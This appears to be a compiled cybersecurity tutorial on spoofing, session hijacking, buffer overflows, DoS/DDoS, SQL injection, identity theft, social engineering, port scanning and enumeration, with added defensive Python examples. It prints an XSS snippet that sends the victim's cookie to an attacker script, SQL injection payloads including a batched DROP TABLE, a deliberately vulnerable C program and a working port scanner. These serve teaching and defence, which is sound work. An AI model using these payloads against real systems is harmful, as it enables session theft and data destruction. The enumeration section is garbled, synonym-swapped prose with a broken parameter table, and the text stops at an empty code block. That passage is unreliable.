• Active monitoring is the proactive part of the strategy: keep an eye on DNS query and answer data and watch for unusual patterns, such as a new external host appearing in answers for your own domains, or a resolver returning records that differ from the authoritative servers.
Spoofing in its various forms is among the most common techniques attackers use today, because it is cheap and can be performed in many ways. The above are a few instances of spoofing and the preventive steps that make an organization safer.
What is Session Hijacking?
TCP session hijacking is an attack on an established user session. A classic method is IP spoofing, where an attacker injects packets carrying the spoofed source address of one of the parties (historically using source-routed IP packets) into an active connection between two nodes, inserting commands while posing as the authenticated user. The attack is possible because authentication is typically done only at the start of a TCP session; after that the server trusts whatever arrives with the right addresses and sequence numbers.
Another form of session hijacking is the man-in-the-middle attack, where the attacker uses a sniffer to observe the communication between the devices and collects the data that is transmitted, including session identifiers.
Different ways of session hijacking:
There are many ways to hijack a session. Some of them are given below:
• Using packet sniffers
The attacker captures the victim's session ID from unencrypted traffic with a packet sniffer and replays it to gain access to the server as the victim. (The original page showed a figure of this exchange here.)
• Cross-site scripting (XSS attack)
The attacker can also capture the victim's session ID with an XSS attack using JavaScript. If the attacker sends the victim a crafted link carrying malicious JavaScript, the script runs in the victim's browser when the link is opened and carries out the attacker's instructions, such as sending the session cookie to a script the attacker controls:
<script type="text/javascript">
// Build a URL to the attacker's collector with the victim's cookies appended...
var adr = '../attacker.php?victim_cookie=' + encodeURIComponent(document.cookie);
// ...and request it, which delivers the cookie string to the attacker.
new Image().src = adr;
</script>
• IP spoofing
Spoofing is pretending to be someone else. Here it is used to gain unauthorized access with the IP address of a trusted host: the attacker obtains the client's IP address and injects packets with that spoofed source address into the TCP session, so that the server believes it is still talking to the original client.
• Blind attack
If the attacker cannot sniff the packets and therefore cannot learn the sequence number the server expects next, the sequence number can be guessed by brute force. This is only practical when initial sequence numbers are predictable; modern stacks randomize them, which is why blind hijacking is far harder today than in the original attacks.
Mitigation
To defend a network against session hijacking, a defender has to implement security measures at both the application level and the network level. Network-level hijacking is prevented by encrypting and authenticating the traffic so that the hijacker can neither read the packets to obtain information that would aid spoofing nor inject packets that will be accepted. This protection is provided by protocols such as IPsec, TLS/SSL and SSH.
IPsec can encrypt packets under a key shared between the two parties in the communication (negotiated with IKE). IPsec runs in two modes, transport and tunnel. In transport mode only the payload of the IP packet is protected and the original IP header is kept; in tunnel mode the entire original packet, header included, is encapsulated inside a new IP packet and protected, which is what site-to-site VPNs use.
At the application level, session identifiers must be long random values, transmitted only over TLS, marked HttpOnly so script cannot read them, and regenerated after login; otherwise a sniffed or stolen cookie is as good as the password.
Session hijacking is a serious threat to networks and web applications, because most systems that rely on a token issued once at login are vulnerable to it.
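The application-level measures above, in working form. This is an added example and not code from the original page; the client "fingerprint" is an opaque string the caller derives however it likes (assumption), and the store is an in-memory dictionary standing in for a real session backend.

```python
"""Session handling hardened against sniffing, XSS cookie theft and fixation (added example)."""
import hmac
import secrets
import time
from http.cookies import SimpleCookie

SESSION_TTL = 15 * 60   # seconds a session id stays valid after it is issued

class SessionStore:
    """Server-side sessions keyed by an unguessable id; nothing sensitive lives in the cookie."""

    def __init__(self):
        self._sessions = {}   # session id -> {"user", "created", "fp"}

    def create(self, user=None, fingerprint="", now=None):
        # 32 random bytes from the OS CSPRNG: a blind attacker cannot guess or brute-force it.
        sid = secrets.token_urlsafe(32)
        created = now if now is not None else time.time()
        self._sessions[sid] = {"user": user, "created": created, "fp": fingerprint}
        return sid

    def lookup(self, sid, fingerprint="", now=None):
        now = now if now is not None else time.time()
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["created"] > SESSION_TTL:
            self._sessions.pop(sid)          # expired ids are removed, not merely refused
            return None
        # Bind the session to a client property (assumption: an opaque fingerprint string
        # such as a hash of the TLS client parameters); a stolen id presented from another
        # client is rejected. Constant-time compare so the check does not leak through timing.
        if not hmac.compare_digest(s["fp"], fingerprint):
            return None
        return s

    def login(self, old_sid, user, fingerprint=""):
        """Rotate the id when privilege changes: an id sniffed or fixed before login becomes useless."""
        self._sessions.pop(old_sid, None)
        return self.create(user, fingerprint)

    def logout(self, sid):
        self._sessions.pop(sid, None)

def session_cookie(sid):
    """Set-Cookie value with the flags that close the capture paths described above."""
    c = SimpleCookie()
    c["session"] = sid
    c["session"]["secure"] = True        # never sent over plain HTTP, so a sniffer never sees it
    c["session"]["httponly"] = True      # document.cookie cannot read it, so the XSS payload gets nothing
    c["session"]["samesite"] = "Strict"  # not attached to cross-site requests
    c["session"]["path"] = "/"
    return c["session"].OutputString()

def missing_cookie_flags(set_cookie_value):
    """Audit helper: which of the three protective attributes a Set-Cookie value lacks."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie_value.split(";")[1:]}
    return [f for f in ("HttpOnly", "SameSite", "Secure") if f.lower() not in attrs]

if __name__ == "__main__":
    store = SessionStore()
    anon = store.create(fingerprint="client-A")
    sid = store.login(anon, "alice", "client-A")
    print("Set-Cookie:", session_cookie(sid))
    print("pre-login id still valid?", store.lookup(anon, "client-A") is not None)
```

The rotation in login() is what defeats session fixation and any id captured before authentication; the HttpOnly flag is what makes the document.cookie payload shown above return nothing; Secure is what keeps the id away from the packet sniffer.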
A buffer is a temporary area for data storage. When a program or system process places more data in it than was originally allocated, the extra data overflows into the adjacent memory, which can corrupt or overwrite whatever that memory was holding: other variables, heap metadata or, on the stack, the saved return address.
In a buffer-overflow attack the extra data is chosen by the attacker; for example it can overwrite the return address so that execution jumps to attacker-supplied instructions, and those instructions can damage files, change data or disclose private information.
An attacker typically uses a buffer-overflow exploit against a program that reads user input without checking its length. There are two broad types: stack-based and heap-based. Heap-based overflows, the less common of the two and generally harder to exploit, corrupt dynamically allocated memory and its management structures. Stack-based overflows, the more common, overrun a fixed-size local array and so overwrite the control data (saved frame pointer, return address) that the stack keeps next to it.
Let us study a real program example in C that shows the danger of such situations.
The example does not inject any malicious code; it only shows that the buffer can be overflowed. Modern toolchains offer run-time mitigations (stack canaries such as GCC's -fstack-protector, non-executable stacks and address-space layout randomization), which make exploitation harder and turn many overflows into a clean abort, but they do not remove the bug: without bounds checking in the code itself the overflow still happens.
    // A C program to demonstrate buffer overflow (deliberately vulnerable)
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    int main(int argc, char *argv[])
    {
        // Reserve space for 4 characters plus the terminating NUL.
        // Anything longer than 4 characters already overruns the array;
        // how much more it takes before the program actually crashes
        // depends on what the compiler placed next to it on the stack.
        char buffer[5];

        // A prompt on how to execute the program...
        if (argc < 2)
        {
            printf("strcpy() NOT executed....\n");
            printf("Syntax: %s <characters>\n", argv[0]);
            exit(0);
        }

        // Copy the user input to buffer without any bounds checking.
        // This is the vulnerability: strcpy() stops only at the NUL byte.
        strcpy(buffer, argv[1]);
        printf("buffer content= %s\n", buffer);

        // A bounded alternative is snprintf(buffer, sizeof buffer, "%s", argv[1]);
        // strcpy_s() is a C11 Annex K function that glibc does not provide.
        printf("strcpy() executed...\n");
        return 0;
    }
Compile the program on Linux, for example with gcc -o output_file program.c, and run it as ./output_file INPUT.
Input: 12345678 (8 bytes): the program ran smoothly on the author's build.
Input: 123456789 (9 bytes): a "Segmentation fault" message was displayed and the program terminated.
The vulnerability exists because the buffer is overflowed whenever argv[1] is longer than 4 characters (strcpy() also writes the terminating NUL). Why did it take 9 bytes to crash? The compiler rounds stack allocations up to the alignment boundary, a 4-byte double word on the 32-bit build used here, so the 5-byte array effectively occupies 8 bytes and the first bytes written past the array land in padding. Only when the write reaches something the program still needs (the saved frame pointer or return address in this layout) does the corruption become visible as a crash. The exact threshold therefore varies between compilers, optimisation levels and architectures; with a stack protector enabled you will see "stack smashing detected" instead of a segmentation fault. The bug is the same in every case.
Standard functions with a length argument, such as strncpy(), strncat() and memcpy(), are less error-prone, but they are not a cure: it remains the programmer's responsibility to pass the correct size of the destination buffer, not the compiler's, and strncpy() in particular does not NUL-terminate when the source is too long.
Every C/C++ programmer must understand the buffer-overflow problem before writing code. A large share of the bugs in C programs are buffer overflows, and many of them can be exploited.
1. DoS attack: a denial-of-service attack, in which a computer sends a massive amount of traffic to a victim's computer or service so that it can no longer serve legitimate users. When done against a website, it makes the site unavailable to its users by overwhelming the Internet-facing server with more traffic or requests than it can handle.
2. DDoS attack: distributed denial of service, in which the DoS traffic is sent from many different locations using many systems (usually a botnet) at the same time.
Difference between DoS and DDoS attacks:

DoS | DDoS
DoS stands for Denial of Service attack. | DDoS stands for Distributed Denial of Service attack.
A single system targets the victim system. | Multiple systems attack the victim's system.
The victim is loaded with packets sent from a single location. | The victim is loaded with packets sent from multiple locations.
A DoS attack is slower and smaller, limited to what one machine can send. | A DDoS attack ramps up faster and reaches far higher volumes.
Can be blocked easily, as only one source address needs to be filtered. | Difficult to block, as many devices send packets from many locations and the sources change.
Only a single device with DoS tooling is used. | Large numbers of bots are used to attack at the same time.
DoS attacks are easy to trace. | DDoS attacks are difficult to trace, since the bots are themselves compromised third-party machines.
Volume of traffic is less than in a DDoS. | Allows the attacker to send massive volumes of traffic to the victim network.
Types of DoS attack: 1. buffer overflow attacks; 2. Ping of Death or ICMP flood; 3. Teardrop attack; 4. flooding attack. | Types of DDoS attack: 1. volumetric attacks; 2. fragmentation attacks; 3. application-layer attacks; 4. protocol attacks.
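The "easy to block / difficult to block" row is the operational difference, and it can be decided from the server's own access log: if the flood comes from one address, filtering that address ends it; if it is spread over hundreds of sources, per-address blocking is useless. The following added example (not code from the original page) classifies constructed Common Log Format lines that way; the addresses are from the documentation ranges and the thresholds are assumptions a real deployment would tune.

```python
"""Separating a single-source flood (DoS) from a distributed one (DDoS) in access logs (added example)."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Common Log Format: client ip, identity, user, [timestamp], "request", status, bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp) or None for a line that is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT)

def classify(lines, window_s=10, flood_threshold=200, single_source_share=0.5):
    """Bucket requests into tumbling windows and judge the busiest one.

    flood_threshold: requests per window above which the site is considered under flood.
    single_source_share: if one IP sends at least this fraction of the flood it is a DoS
    (block that address); otherwise the load is distributed and per-IP blocking will not help.
    """
    events = [e for e in map(parse_line, lines) if e is not None]
    if not events:
        return {"verdict": "no-data"}
    events.sort(key=lambda e: e[1])
    start = events[0][1]
    windows = defaultdict(Counter)
    for ip, ts in events:
        windows[int((ts - start).total_seconds()) // window_s][ip] += 1
    idx, per_ip = max(windows.items(), key=lambda kv: sum(kv[1].values()))
    total = sum(per_ip.values())
    top_ip, top_n = per_ip.most_common(1)[0]
    if total < flood_threshold:
        verdict = "normal"
    elif top_n / total >= single_source_share:
        verdict = "dos"
    else:
        verdict = "ddos"
    return {"verdict": verdict, "peak_window_start": start + timedelta(seconds=idx * window_s),
            "peak_requests": total, "distinct_sources": len(per_ip),
            "top_source": top_ip, "top_source_share": round(top_n / total, 2)}

def make_sample(kind):
    """Constructed log lines: a little background traffic plus, optionally, a 350-request burst
    from one attacker ("dos") or spread over 200 addresses ("ddos")."""
    base = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
    def line(ip, offset_ms):
        ts = (base + timedelta(milliseconds=offset_ms)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "GET /index.html HTTP/1.1" 200 512'
    lines = [line(f"192.0.2.{i}", i * 900) for i in range(1, 9)]
    if kind == "dos":
        lines += [line("198.51.100.9", 1000 + k * 20) for k in range(350)]
    elif kind == "ddos":
        lines += [line(f"203.0.113.{k % 200 + 1}", 1000 + k * 20) for k in range(350)]
    return lines

if __name__ == "__main__":
    for kind in ("normal", "dos", "ddos"):
        print(kind, classify(make_sample(kind)))
```

A tumbling window is deliberately simple; a production detector would use a sliding window and compare against a learned baseline rather than a fixed count, and would look at SYN counters from the kernel as well, since a SYN flood never produces an access-log line at all.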
SQL injection is a technique in which an attacker supplies web-page input that is incorporated unchanged into an SQL statement, so that the input is executed as part of the command. Malicious users can use it to manipulate the application's database through the web server.
1. SQL injection is a code-injection technique that can compromise your database.
2. SQL injection is one of the most common web hacking techniques.
3. SQL injection is the placement of malicious code into SQL statements via web-page input.
The Exploitation of SQL Injection in Web Applications
Web servers communicate with database servers whenever they need to retrieve or store user data. The attacker designs input so that, when the web application builds its query from that input, the resulting statement does something the developer never intended while the server is fetching content from the database. This compromises the security of the web application.
Example of SQL Injection
Suppose we have an application for student records. Any student can view only his or her own records by entering a unique and private student ID. The form has a field like the one below:
Student id: the student enters the following in the input field: 12222345 OR 1=1
Query:
SELECT * FROM STUDENT WHERE
STUDENT_ID = 12222345 OR 1=1
Because 1=1 holds for every row, the query returns all records, and all the student data is compromised. The malicious user can also delete student records in a similar fashion. Consider the following login query.
Query:
SELECT * FROM USER WHERE
USERNAME = '' AND PASSWORD = ''
The malicious user can use the quote character and the OR operator to retrieve private information. Instead of the query above, the following query is what gets executed, and it retrieves protected data not intended to be shown to users.
Query:
SELECT * FROM USER WHERE
(USERNAME = '' OR 1=1) AND
(PASSWORD = '' OR 1=1)
Since 1=1 always holds true, all user data is returned.
Impact of SQL Injection
The hacker can retrieve all the user data present in the database, such as user details, credit-card information and social-security numbers, and can gain access to protected areas like the administrator portal. It is also possible to modify or delete data in the tables, and on some database servers to read files or execute commands on the host.
Nowadays all online shopping applications and bank transactions use back-end database servers, so if the hacker is able to exploit SQL injection, the entire data store, and potentially the server, is compromised.
Preventing SQL Injection
• Parameterised queries (prepared statements): send the SQL text and the user-supplied values to the database separately, so the values can never be parsed as SQL. This is the primary defence.
• Input validation: define the expected length and type of each input field and reject anything else (a numeric ID must be a number).
• Least privilege: restrict the database account the application uses and define how much data any outside user can reach; users should not be granted permission to access everything in the database.
• Do not connect the application to the database with a system-administrator (DBA) account.
SQL in Web Pages
SQL injection typically occurs when you ask a user for input, such as a username or user ID, and the user supplies an SQL fragment instead of a plain value, which you then concatenate into a statement and execute without realising what it now says:
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users
WHERE UserId = " + txtUserId;
SQL Injection Based on Batched SQL Statements
1. Most databases support batched SQL statements.
2. A batch of SQL statements is a group of two or more statements separated by semicolons.
The SQL statement below will return all rows from the "Users" table and then delete the "Employees" table.
Query:
SELECT * FROM Users;
DROP TABLE Employees
Look at the following example:
Syntax:
txtEmpId = getRequestString("EmpId");
txtSQL = "SELECT * FROM Users
WHERE EmpId = " + txtEmpId;
The valid SQL statement would look like this:
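The two injection patterns above (the always-true OR condition and the batched DROP TABLE) next to the parameterised form that defeats them, run against an in-memory SQLite database. This is an added example, not code from the original page; the tables and rows are constructed, and executescript() stands in for a driver that executes a whole batch, since sqlite3's execute() refuses a second statement.

```python
"""String-built SQL next to its parameterised form, run against in-memory SQLite (added example)."""
import sqlite3

def setup_db():
    """Constructed sample data for the Users/Employees tables named in the text."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users(UserId INTEGER PRIMARY KEY, Username TEXT, Password TEXT);
        CREATE TABLE Employees(EmpId INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Users VALUES (105, 'alice', 'wonderland'), (106, 'bob', 'builder');
        INSERT INTO Employees VALUES (1, 'Alice A.'), (2, 'Bob B.');
    """)
    return conn

def table_names(conn):
    return [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]

def lookup_user_vulnerable(conn, txt_user_id):
    # Same construction as the txtSQL snippet above: the request string becomes SQL text.
    sql = "SELECT * FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(sql).fetchall()

def lookup_user_safe(conn, user_id):
    # The value travels as a bound parameter; the database never parses it as SQL.
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (user_id,)).fetchall()

def login_vulnerable(conn, username, password):
    # Quoted string fields: a quote in the input ends the literal early, the rest is SQL.
    sql = f"SELECT * FROM Users WHERE Username = '{username}' AND Password = '{password}'"
    return conn.execute(sql).fetchall()

def login_safe(conn, username, password):
    return conn.execute("SELECT * FROM Users WHERE Username = ? AND Password = ?",
                        (username, password)).fetchall()

def lookup_user_batched(conn, txt_user_id):
    """Batched-statement variant: executescript() runs every statement it is handed,
    the way a driver that accepts batches behaves (assumption)."""
    conn.executescript("SELECT * FROM Users WHERE UserId = " + txt_user_id)
    return table_names(conn)

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, '105 OR 1=1' ->", lookup_user_vulnerable(db, "105 OR 1=1"))
    print("parameterised, same input ->", lookup_user_safe(db, "105 OR 1=1"))
    print("vulnerable login, \"' OR 1=1 --\" ->", login_vulnerable(db, "' OR 1=1 --", "x"))
    print("tables after batched input ->", lookup_user_batched(db, "105; DROP TABLE Employees"))
```

Note that the safe lookup with the injected string returns nothing rather than raising: the value is compared as text against an integer column and simply matches no row, which is the point of keeping data and code apart.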
Identity theft, also called identity fraud, is a crime committed in very large numbers nowadays. It happens when someone steals your personal information and uses it to commit fraud. It is committed in many ways, for example by gathering another person's personal and transaction details in order to make transactions in their name.
Example: thieves use different techniques to extract customers' credit-card details from corporate databases; once they have the details they can run up charges and ruin the victim's credit rating. The damage is large if the theft is not noticed early. With the stolen credentials they can also obtain a new credit card in the victim's name and use it to cover fraudulent debts.
Types of Identity Theft:
There are many variants, but some common ones are:
• Criminal identity theft: the thief, when arrested or charged, presents the victim's documents (ID card or other verification documents) as his own; if the bluff succeeds the victim ends up with the criminal record and the consequences.
• Senior identity theft: people over 60 are frequent targets. They are sent material that looks legitimate and their personal information is harvested from their replies. Seniors in particular must be aware of the risk.
• Driver's-licence identity theft: one of the most common forms. A driver's licence carries the holder's name, address and date of birth as well as the state licence number. Thieves use this information to apply for loans or credit cards, open bank accounts, or buy cars, electronics, jewellery and anything else valuable, all charged to the victim's name.
• Medical identity theft: the victim's health-related information is gathered and used to obtain medical services or submit fraudulent bills, which then appear on the victim's account and medical record.
• Tax identity theft: the attacker wants your tax identification number (for example an Employer Identification Number) in order to file a return and claim a refund in your name. It is usually noticed when you try to file your own return, or when the tax department sends a notice about a return you never filed.
• Social-security identity theft: the thief is after your Social Security Number (SSN). With it they can reach most of your other personal information, which makes it the biggest single threat to an individual.
• Synthetic identity theft: unlike the others, the thief combines gathered information from several people to create a new, fictitious identity. When that identity is used, all the people whose data was combined are affected.
• Financial identity theft: the most common type. Stolen credentials are used to obtain a financial benefit. Because it is practised slowly, the victim notices only if he checks his balances carefully.
Techniques of Identity Theft: identity thieves sometimes hack into corporate databases for personal credentials, which takes effort, but social-engineering techniques often make the job easy. Some common techniques are:
• Pretext calling: thieves phone the victim pretending to be an employee of a company and ask for financial information, typically offering some reward in return.
• Mail theft: credit-card statements and other documents containing transaction data are taken from the victim's mailbox.
• Phishing: emails purporting to be from a bank are sent to the victim, carrying malware or a link to a fake site. When the victim responds, their information is captured by the thieves.
• Internet: attackers set up public networks or Wi-Fi hotspots under their control and bundle spyware with downloads, capturing what users send.
• Dumpster diving: a great deal of information has leaked from well-known institutions this way. Thieves go through discarded rubbish for account documents, social-security numbers and other personal papers that were not shredded before disposal.
• Card Verification Value (CVV) code requests: the CVV is printed on the back of debit and credit cards and is used to strengthen transaction security; attackers ask for it while pretending to be a bank official.
Steps of Prevention from Identity Theft:
The following measures improve your protection against identity theft:
1. Use strong passwords and do not share your PIN with anyone, on or off the phone.
2. Use two-factor authentication for email and other important accounts.
3. Secure all your devices with a password.
4. Do not install random software from the Internet.
5. Do not post sensitive information on social media.
6. Before entering passwords at a payment gateway, make sure it is genuine.
7. Limit the personal information you carry with you.
8. Change your PINs and passwords regularly.
9. Do not disclose your information over the phone.
10. While travelling, do not disclose personal information to strangers.
11. Never share your Aadhaar/PAN number (in India) with anyone you do not know or trust.
12. Never share your SSN (in the US) with anyone you do not know or trust.
13. Do not make all the personal information on your social-media accounts public.
14. Never share an Aadhaar OTP received on your phone with someone over a call.
15. Be alert if you receive OTP SMS messages about Aadhaar that you did not request: if you do, your Aadhaar number is already in the wrong hands.
16. Do not enter personal data on websites that claim to offer benefits in return.
17. Finally, be a careful keeper of your own personal information.
Social engineering is the act of manipulating people into giving up private or confidential information by appearing to be someone they would trust, such as an insider. For example, asking a person for help with your car and saying you know someone who can fix it if they hand you the keys to the vehicle. Some people might trust that story and give up their keys, while others will see it as a scam and hand over nothing.

Methodology:
Footprinting is the reconnaissance phase that precedes an attack: collecting everything that can be learned about the target, its network, its people and its premises, often under cover of distractions or pretexts so that no suspicion is raised. It is useful when an attacker wants to do something illegal later, such as stealing confidential or proprietary files from company computers, or committing fraud. Footprinting is less direct than approaching an employee with social engineering, but it has the advantage of a low profile and a low chance of being caught. It is most valuable where the attacker has no special access to the target and no prior knowledge of it. For example, someone who wants to commit fraud at a bank but knows none of its employees and has never dealt with the bank can only learn who works there, how they can be contacted and which procedures they follow by footprinting first. All of these are valuable pieces of information for the later attack.

Information Gathering Methods:
Social engineering is the act of attempting to manipulate individuals into performing actions or divulging confidential information by direct contact, fake authority, or the appearance of legitimacy. From pretending to be a representative of your company in order to coax confidential information out of a user on the phone, to simply walking up behind someone who is absorbed in their screen and reading off passwords and personal data, social engineering can happen anywhere and offers immediate rewards.
• Eavesdropping: listening in on a conversation without being noticed. This is a particularly common, and arguably the most effective, form of social engineering. Phone hacking makes the headlines, but simply overhearing a conversation in a café, a train or an office corridor accounts for a great many leaks every year.
• Shoulder surfing: looking over someone's shoulder to see what is on their screen without their consent. There are several variants; the most common is simply watching a monitor or keyboard from behind, but a camera in a public place serves the same purpose.
• Dumpster diving: retrieving discarded documents, media or equipment from rubbish bins and skips. Printouts, sticky notes, old hard disks and unshredded paperwork frequently contain credentials, internal phone lists and other data that make later attacks much easier.
Footprinting Tools:
• Social-engineering frameworks and toolkits (for example the Social-Engineer Toolkit, SET)
• Phishing intelligence services (for example PhishLabs)
• Web-application fingerprinting tools
• Passive information gathering: search engines, WHOIS, DNS records, job postings and social networks
• Google Hacking Database (GHDB), a catalogue of search queries that expose sensitive files and pages
Countermeasures:
• Limit what an outsider can learn: publish only the contact details, organisational charts and technical information that are actually needed, and review what search engines and social networks reveal about the organisation.
• Secure the physical premises: control building access, verify visitors and contractors, and shred or wipe documents and equipment before disposal.
• Train employees to recognise pretexting, unexpected requests for codes or credentials and attempts to gain their trust, and give them a simple way to verify and report such approaches.
• Remember that an attacker who has footprinted a building knows which keys, codes or badges he needs; rotate codes, revoke badges promptly and do not rely on obscurity.
Conclusion:
Footprinting serves several purposes depending on the attacker's situation. It can be done subtly or quite openly, but either way it gives the attacker the picture of the target location he needs before acting. This makes it especially useful where an attacker has no special access to a target and no previous knowledge of how it operates or who is guarding it.
Attackers use various methods to carry out cyber-attacks on a computer network, depending on how easily the network can be attacked through its vulnerabilities. Each type of cyber-attack is risky and harmful. Awareness of cyber crime is very important for today's young generation, both to prevent it and to feel safe while using the Internet.
Here we discuss one such very harmful technique, the port scanning attack.
Port Scan attack:
• A port scan is a reconnaissance technique that probes a host to discover which ports are open, and so which services may be vulnerable to attack.
• It helps attackers identify entry points into a network and the services behind them.
• Ports matter because they direct traffic entering and leaving a computer to the right application; the response (or silence) a port returns to a probe tells the attacker whether it is open, closed or filtered.
• Port scanning also reveals the network's security mechanisms, such as active firewalls that drop probes, and often the operating system and service versions.
• Attackers look for open ports and then target the services listening on them, through which they can send and receive data.
• A discovered open port is used to exploit vulnerabilities in the listening application, giving the attacker direct access to the target.
• Since applications listen on these ports, attackers take advantage of them to read, manipulate or delete confidential user information.
• Nmap, Netcat and various IP scanning tools are used to scan ports and check for vulnerable services.

Aim and Consequences:
• Port scanning is used by attackers to map the services and security posture of the target network.
• If proper security mechanisms, including authentication, are not implemented on exposed services, those services become the attack point.
• Cybercriminals combine the open-port information with known vulnerabilities in the exposed services to get into user or organisation systems.

Prevention:
The preventive measures for port scan attacks are listed as follows:
• Firewalls:
  - A firewall tracks traffic to and from open ports, both incoming and outgoing, and exposes only the ports that must be reachable.
  - A port is identified as open because the target host responds to the probe with packets showing that it is listening; a firewall that silently drops unsolicited probes denies the attacker that information and can log the sweep for detection.
• Strong security mechanisms:
  - Hosts with hardened, patched and authenticated services can keep their necessarily open ports from being exploited.
  - Security administrators must ensure that no unnecessary service is listening and that access to the remaining open ports is restricted to those who need it.
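What a scanner actually does for each port, in the simplest form (a TCP connect scan, the kind Nmap runs with -sT). This is an added example and not the page's code; the demo function starts its own listener on the loopback interface so the scan has a known open port to find without touching any other host. Scan only hosts you are authorised to test.

```python
"""TCP connect() port scan with a built-in loopback demonstration (added example)."""
import socket
from concurrent.futures import ThreadPoolExecutor

def probe(host, port, timeout=0.5):
    """Classify one port the way a connect scan does: complete the handshake or not."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return port, "open"           # SYN/ACK came back and the handshake completed
        except ConnectionRefusedError:
            return port, "closed"         # RST: the host is up but nothing listens here
        except (TimeoutError, socket.timeout):
            return port, "filtered"       # silence: usually a firewall dropping the SYN
        except OSError:
            return port, "error"          # unreachable network, no route, etc.

def connect_scan(host, ports, workers=32, timeout=0.5):
    """Scan the given ports in parallel; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: probe(host, p, timeout), ports))

def open_ports(results):
    return sorted(p for p, state in results.items() if state == "open")

def demo_local_scan(span=2):
    """Listen on an ephemeral loopback port, scan the ports around it, return (port, results)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))    # port 0: the OS picks a free port
    listener.listen(5)                 # a backlog lets connect() succeed without accept()
    port = listener.getsockname()[1]
    try:
        results = connect_scan("127.0.0.1", range(max(1, port - span), min(65535, port + span) + 1))
    finally:
        listener.close()
    return port, results

if __name__ == "__main__":
    port, results = demo_local_scan()
    for p, state in sorted(results.items()):
        print(f"127.0.0.1:{p} {state}")
```

A connect scan completes the handshake, so every probe is visible in the target's logs and connection tables; that is exactly the trace the firewall measures above are meant to catch, and why attackers prefer half-open (SYN) scans that need raw sockets.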

Enumeration is fundamentally checking. An attacker sets up a functioning


associated with the objective host. The weaknesses are then tallied and
evaluated. It is done mostly to look for assaults and dangers to the objective
framework. Enumeration is utilized to gather usernames, hostname, IP
addresses, passwords, arrangements, and so on. At the point when a
functioning connection with the objective host is set up, hackers oversee the
objective framework. They at that point take private data and information. Now
and again, aggressors have additionally been discovered changing the setup of
the objective frameworks. The manner in which the connection is set up to the
host decides the information or data the attacker will have the option to get to.
Types Of Enumeration
In this section, we will be discussing the various types of Enumerations.
1. NetBIOS(Network Basic Input Output System) Enumeration:
 NetBIOS name is an exceptional 16 ASCII character string used to
distinguish the organization gadgets over TCP/IP, 15 characters are utilized
for the gadget name and the sixteenth character is saved for the
administration or name record type.
 Programmers utilize the NetBIOS enumeration to get a rundown of PCs
that have a place with a specific domain, a rundown of offers on the
individual hosts in the organization, and strategies and passwords.
 NetBIOS name goal isn’t supported by Microsoft for Internet Protocol
Version 6.
 The initial phase in specifying a Windows framework is to exploit the
NetBIOS API. It was initially an Application Programming Interface(API) for
custom programming to get to LAN assets. Windows utilizes NetBIOS for
document and printer sharing.
 A hacker who finds a Windows OS with port 139 open, can verify what
assets can be gotten to or seen on the far off framework. In any case, to
count the NetBIOS names, the distant framework probably empowered
document and printer sharing. This sort of enumeration may empower the
programmer to peruse or keep in touch with the distant PC framework,
contingent upon the accessibility of offers, or dispatch a DoS.
 NetBIOS name list:
Name NetBIOS Code Type

<host name> <00> UNIQUE

<domain> <00> GROUP

<host name> <03> UNIQUE

<username> <03> UNIQUE

<host name> <20> UNIQUE

<domain> <1D> GROUP

<domain> <1B> UNIQUE

 Nbtstat Utility: In Windows, it shows NetBIOS over TCP/IP (NetBT)


convention insights, NetBIOS name tables for both the neighborhood and
distant PCs, and the NetBIOS name reserve. This utility allows a resuscitate
of the NetBIOS name cache and the names selected with Windows Internet
Name Service. The sentence structure for Nbtstat:
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s]
[-S] [Interval]
The table appeared beneath shows different Nbtstat boundaries:

Parameters

-a RemoteName
Parameters

-A IPAddress

-c

-n

-r

-RR

-s

-S

Interval

2. SNMP(Simple Network Management Protocol) Enumeration:
 SNMP enumeration is the process of enumerating user accounts and devices on
a target system using SNMP. SNMP consists of a manager and an agent; agents
are embedded on each network device, and the manager is installed on a
separate computer.
 SNMP holds two passwords, called community strings, to access and configure
the SNMP agent from the management station. The read community string is
"public" by default and allows viewing of the device/system configuration.
The read/write community string is "private" by default and allows remote
editing of the configuration. In SNMPv1 and SNMPv2c these strings travel in
clear text in every packet.
 Attackers use these default community strings to extract information about
a device. They enumerate SNMP to extract information about network resources
such as hosts, routers, devices, shares, etc., and network information such
as ARP tables, routing tables, traffic, etc.
 SNMP uses a distributed architecture consisting of SNMP agents, managers,
and several related components. The PDUs (commands) associated with SNMP are
GetRequest, GetNextRequest, GetResponse, SetRequest, and Trap.
Figure: the communication between the SNMP agent and manager (figure not
reproduced here).
 SNMP enumeration tools scan a single IP address or a range of IP addresses
of SNMP-enabled network devices to monitor, diagnose, and troubleshoot
security threats. Examples of such tools include NetScanTools Pro, SoftPerfect
Network Scanner, SNMP Informant, etc.
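What a manager actually puts on the wire, as an added example: an SNMPv1 GetRequest for sysDescr.0 encoded by hand with ASN.1 BER, and a decoder that reads the GetResponse back. It is not code from the page or from any SNMP library; the agent reply is constructed (the hostname and sysDescr text are fictitious), and snmp_get() is the only function that touches the network, when called. Decoding the request shows why "public" is enough: the community string is a plain OCTET STRING that anyone on the path can read.

```python
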